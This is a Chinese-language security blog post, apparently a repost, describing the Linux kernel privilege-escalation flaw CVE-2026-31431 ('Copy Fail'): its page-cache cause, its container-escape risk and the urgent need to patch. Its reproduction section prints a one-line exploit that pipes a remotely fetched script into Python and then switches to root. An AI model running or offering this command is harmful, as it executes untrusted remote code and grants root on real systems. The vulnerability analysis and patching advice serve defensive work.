文章总结： CVE-2026-31431是Linux内核高危本地提权漏洞，因2017年性能优化错误将文件缓存页面作为可写缓冲区，攻击者通过732字节Python脚本可篡改全局内存文件缓存实现一键提权，直接影响容器逃逸和云环境安全，需立即修复。 综合评分： 85 文章分类： 漏洞分析,云安全,Linux内核,容器安全,应急响应

[已复现] Linux核弹级提权漏洞 Copy Fail (CVE-2026-31431) 一句话命令秒提权

原创

qysec qysec

吃瓜安全

2026年4月30日 18:41 上海

在小说阅读器读本章

去阅读

近日，安全研究人员披露了一个编号为CVE-2026-31431（代号“Copy Fail”）的Linux内核高危本地提权漏洞。此漏洞自2017年潜伏至今，影响极其广泛。攻击者仅需一个732字节的Python脚本，无需任何竞态条件，即可从普通用户权限一键获取root权限，并可直接用于容器逃逸，对云环境、K8s集群和CI/CD系统构成严重威胁。— 一、漏洞核心：一个“写错地方”的优化     漏洞的根源是2017年Linux内核为提升性能所做的一次“原地操作”优化。简单来说，内核在通过AF\_ALG接口处理一种特定的加密操作（AEAD解密）时，错误地将文件的缓存页面当成了临时的可写缓冲区。 这使得攻击者可以通过组合splice()系统调用，向这个全局共享的缓存页面中精确写入4个可控字节。最关键的是，这个写入操作不会被内核标记为“脏页”，因此磁盘上的原始文件完好无损，但内存中所有进程读取到的该文件都已经是篡改后的版本。 二、为何被称为“史诗级”漏洞？ 1. 利用极其简单可靠：一个不足1KB的脚本，成功率极高，无需复杂条件。 2. 直接影响容器安全根基：利用共享内核页面缓存的机制，攻击可以从一个被入侵的容器内发起，直接篡改宿主机的文件缓存，实现容器逃逸，打破了云环境的租户隔离假设。 3. 影响范围巨大：2017年后至修复前的几乎所有主流Linux发行版（Ubuntu, RHEL, CentOS, Amazon Linux, Debian等）均受影响。 4. 隐蔽性强：内存文件被改，磁盘文件不变，许多文件完整性检查工具会“失灵”。 三、影响范围 – 云服务与K8s集群：租户容器可逃逸控制宿主机节点，风险最高。 – 多用户共享服务器：如开发机、跳板机、编译服务器，任何普通用户都可能瞬间变为root。 – CI/CD自托管Runner：执行外部PR代码即可让运行主机沦陷。 – 所有使用受影响内核的Linux服务器和个人电脑。 参考了https://mp.weixin.qq.com/s/wISLrM709AHEXEnQPynfew 四、漏洞复现exp

curl https://copy.fail/exp | python3 && su

exp只有一句话,提权速度极快,正常网络环境下3秒内即可提权相较于下面几个漏洞,速度简直不要太快 kali2024 火山云ubuntu22.04 五、总结 CVE-2026-31431不是一个普通的提权漏洞，它是一个能从容器内部直接“融化”宿主主机隔离墙” 的利器。其简单的利用方式、广泛的影响面和针对云原生环境的定向打击能力，使其成为近年来最具威胁的Linux内核漏洞之一。 所有系统管理员、云平台运维和安全团队都应将其修复优先级调至最高，立即评估并修复受影响资产，尤其是在多租户和容器化环境中。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：吃瓜安全 qysec qysec《[已复现] Linux核弹级提权漏洞 Copy Fail (CVE-2026-31431) 一句话命令秒提权》